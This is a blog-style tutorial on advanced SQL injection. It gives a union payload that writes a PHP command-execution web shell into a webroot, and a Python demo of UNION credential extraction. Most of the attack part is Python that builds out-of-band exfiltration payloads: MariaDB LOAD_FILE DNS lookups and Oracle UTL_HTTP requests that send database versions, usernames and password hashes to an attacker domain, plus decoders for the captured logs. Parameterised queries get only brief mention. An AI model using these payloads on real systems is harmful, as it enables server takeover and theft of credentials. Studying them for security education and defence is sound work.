In the previous blog we covered the very basics of SQL injection. In this one we look at some more advanced possibilities of a SQL injection attack.
SQL injection is one of the most common vulnerabilities encountered on the web and can also be one of the most dangerous. Attackers can inject malicious SQL in order to extract sensitive information, modify or destroy existing data, or escalate the attack in an attempt to take over the server.
In the previous blog we found that the vulnerable query returns 2 columns, which we discovered with SQL's ORDER BY clause. Now that we have a little more information about the database, we can use it to perform a union-based SQL injection. The UNION operator combines the results of two or more SELECT statements, but for it to work the statements must return the same number of columns (with compatible types).
We can do many things with union-based injections, but here let's try to run operating system commands. That is indeed possible, and the simplest way is to upload a small PHP shell. To do so we need to know the document root of the web server. The type of web server can often be guessed from the application, but the document root varies, especially if the admin has changed the default location.
For understanding purposes, let's assume that the default Apache webroot (/var/www/) is in use and that the database server process is allowed to write there. Note that in MySQL/MariaDB, writing files also requires the FILE privilege, and the secure_file_priv setting can restrict the allowed directory or disable file writes entirely.
NOTE: Information about the web server, including the document root, can usually be found in a "phpinfo.php" file if the admin has left one accessible.
We can use the INTO OUTFILE clause to write the query result to a file. The value we write will be a simple PHP script that executes a command taken from a GET parameter:
<?php system($_GET["cmd"]); ?>
Let's inject. The script uses double quotation marks around cmd because the whole script has to be enclosed in single quotes inside the statement to avoid syntax errors. The payload looks like this, where cmd.php is the name of our shell file and # comments out the rest of the original query:
' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' #
If this works, we can reach our shell via its URL and execute commands by passing them in the cmd parameter.
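As an added example (not from the original post), the union-based mechanics above reproduced in Python against an in-memory SQLite database with constructed sample data. SQLite has no INTO OUTFILE, so the file-writing step is not reproduced; the example shows the ORDER BY column-count probing, a UNION that pulls rows from another table once the column counts match, the error the database returns when they do not, and the parameterised version of the same query, which is the fix. The table and column names are assumptions made for the example.

```python
import sqlite3


# Constructed sample schema loosely modelled on DVWA's users table; not real data.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT);
        INSERT INTO users VALUES (1, 'admin', 'admin'), (2, 'gordon', 'brown');
        CREATE TABLE credentials (username TEXT, password_hash TEXT);
        INSERT INTO credentials VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn


def lookup_vulnerable(conn, user_id):
    """The injectable pattern: user input pasted into the query text.

    Two columns are selected, which is why a UNION payload needs two as well.
    SQLite takes '--' as a line comment (MySQL also accepts '#', as in the
    DVWA payload above); '-- ' swallows the closing quote the app appends.
    """
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """Same query, parameterised: the payload is only a value that matches no row."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def find_column_count(conn, lookup, limit=10):
    """ORDER BY n probing: the first n that errors is one past the column count.

    Returns None when no probe errors, i.e. the input is not injectable this way.
    """
    for n in range(1, limit + 1):
        try:
            lookup(conn, f"1' ORDER BY {n} -- ")
        except sqlite3.OperationalError:
            return n - 1
    return None


def union_error(conn, lookup, payload):
    """Run a UNION payload and return the database error text, or None if it ran."""
    try:
        lookup(conn, payload)
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None


# Matching column count: rows from credentials come back through the users query.
UNION_PAYLOAD = "1' UNION SELECT username, password_hash FROM credentials -- "
# One column only: the database refuses the UNION.
BAD_UNION_PAYLOAD = "1' UNION SELECT username FROM credentials -- "

if __name__ == "__main__":
    conn = make_db()
    print("columns:", find_column_count(conn, lookup_vulnerable))
    print("vulnerable:", lookup_vulnerable(conn, UNION_PAYLOAD))
    print("mismatch:", union_error(conn, lookup_vulnerable, BAD_UNION_PAYLOAD))
    print("safe:", lookup_safe(conn, UNION_PAYLOAD))
```

Running the script prints a column count of 2, the credentials row leaking through the vulnerable lookup, SQLite's "same number of result columns" error for the mismatched payload, and an empty result from the parameterised lookup.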
Out-of-band (OOB) techniques give an attacker an alternative way to confirm and exploit a vulnerability that is otherwise "blind". In a blind vulnerability the attacker does not get the output of the injected query in the direct response to the vulnerable request. OOB techniques require the vulnerable system to generate an outbound TCP/UDP/ICMP request, which then lets the attacker exfiltrate data. The success of an OOB SQL injection attack therefore depends on the egress firewall rules, i.e. which outbound requests are permitted from the vulnerable system through the perimeter firewall.
An OOB SQL injection exfiltrates data through an outbound channel, usually DNS or HTTP. Whether the database can initiate an outbound DNS or HTTP request depends on the functions available to it: either file-operation functions (for instance load_file() in MySQL/MariaDB or master..xp_dirtree in MSSQL) or connection functions (for instance DBMS_LDAP.INIT and UTL_HTTP.REQUEST in Oracle).
For DNS-based exfiltration we use MariaDB, one of the forks of MySQL. The query exfiltrates the database version, username and password hash. load_file() is used to trigger the outbound DNS request: given a UNC path such as \\<data>.attacker-domain\share, the server resolves the hostname before attempting the file read, which only works when the database runs on Windows. A period (.) is used as a delimiter to organize the captured data into separate DNS labels, so each piece must fit the 63-character label limit.
Oracle is used to demonstrate HTTP-based exfiltration with the UTL_HTTP.REQUEST function, which makes the database issue an HTTP request to a URL of the attacker's choosing. The query exfiltrates the database version, current username and password hash, and the strings version, user and hashpass are used to organize the captured data as parameters of the HTTP request.
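As an added example (not from the original post) covering both the MariaDB DNS channel and the Oracle HTTP channel described above: the attacker-side Python that builds each payload and the matching decoder that turns what the attacker's DNS and HTTP listeners log back into values. The attacker domain, the share name, the query-string field names and the sys.user$ hash source are assumptions for the example; the captured DNS name and HTTP request line are constructed samples, not real captures. The MariaDB payload hex-encodes the value and slices it with SUBSTR so that each DNS label stays within the 63-byte limit, which is the detail the one-line payload hides.

```python
import binascii
from urllib.parse import parse_qs, urlsplit

# Assumption: a domain whose authoritative DNS server and web server we control.
ATTACKER_DOMAIN = "oob.attacker.example"
# DNS labels are at most 63 bytes; 62 keeps hex pairs whole (31 raw bytes per label).
HEX_CHUNK = 62


def mariadb_dns_payload(expr, chunk=0, domain=ATTACKER_DOMAIN):
    """Query that makes MySQL/MariaDB on Windows resolve <hex(expr)>.<domain>.

    LOAD_FILE() on a UNC path triggers a name lookup before any SMB access,
    so the value leaves as a DNS query even though the file read itself fails.
    HEX() keeps the label DNS-safe; SUBSTR() selects one 62-char slice so a
    long value (e.g. a 41-char password hash) is sent over several queries.
    The share name after the domain is an arbitrary assumption.
    """
    start = 1 + chunk * HEX_CHUNK
    return (
        "SELECT LOAD_FILE(CONCAT('\\\\\\\\', "
        f"SUBSTR(HEX({expr}), {start}, {HEX_CHUNK}), "
        f"'.{domain}\\\\share'))"
    )


def hex_chunks(value):
    """Client-side mirror of HEX()+SUBSTR() slicing, to predict the labels."""
    h = binascii.hexlify(value.encode()).decode().upper()
    return [h[i:i + HEX_CHUNK] for i in range(0, len(h), HEX_CHUNK)]


def decode_dns_name(qname, domain=ATTACKER_DOMAIN):
    """Turn a captured query name back into the list of decoded labels.

    One label per field (the period-delimiter idea from the post), or several
    labels holding consecutive chunks of one long value; the caller joins those.
    Returns None for lookups that are not for our domain.
    """
    name = qname.rstrip(".").lower()
    suffix = "." + domain.lower()
    if not name.endswith(suffix):
        return None
    labels = [l for l in name[:-len(suffix)].split(".") if l]
    return [bytes.fromhex(l).decode("utf-8", "replace") for l in labels]


def oracle_http_payload(domain=ATTACKER_DOMAIN):
    """Query that makes Oracle issue GET /?version=..&user=..&hashpass=.. to us.

    UTL_URL.ESCAPE(x, TRUE) percent-encodes spaces and '&'/'=' inside values
    so they survive as separate query-string parameters.
    Assumption: reading sys.user$ needs elevated privileges, and which column
    holds the hash depends on the Oracle version.
    """
    fields = {
        "version": "(SELECT banner FROM v$version WHERE ROWNUM = 1)",
        "user": "USER",
        "hashpass": "(SELECT password FROM sys.user$ WHERE name = USER)",
    }
    query = "||'&'||".join(
        f"'{k}='||UTL_URL.ESCAPE({v}, TRUE)" for k, v in fields.items()
    )
    return f"SELECT UTL_HTTP.REQUEST('http://{domain}/?'||{query}) FROM dual"


def decode_http_request_line(line):
    """Parse the request line our HTTP listener logs into {param: value}."""
    _method, target, _version = line.split(" ", 2)
    return {k: v[0] for k, v in parse_qs(urlsplit(target).query).items()}


# Constructed samples of what the listeners would see, not real captures.
SAMPLE_DNS_QUERY = (
    "31302E362E31322D4D6172696144422D6C6F67."  # HEX('10.6.12-MariaDB-log')
    "726F6F74406C6F63616C686F7374."            # HEX('root@localhost')
    "oob.attacker.example."
)
SAMPLE_HTTP_LINE = (
    "GET /?version=Oracle%20Database%2019c&user=SCOTT&hashpass=F894844C34402B67 HTTP/1.1"
)

if __name__ == "__main__":
    print(mariadb_dns_payload("version()"))
    print(mariadb_dns_payload("(SELECT password FROM mysql.user LIMIT 1)", chunk=1))
    print(oracle_http_payload())
    print(decode_dns_name(SAMPLE_DNS_QUERY))
    print(decode_http_request_line(SAMPLE_HTTP_LINE))
```

In a real injection the SELECT built here is dropped into the injectable position (for example as a subquery in the UNION column from the first half of this post) rather than run on its own; the decoders run on the attacker's side against the DNS and web server logs.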
Knowing these techniques also helps with prevention: restricting the characters and statement types that can pass through request parameters blocks the simplest payloads. There are, however, many ways around such filters and restrictions, and many other interesting inputs an attacker can use to reach stored procedures and other functionality, so input filtering alone is not a substitute for parameterised queries.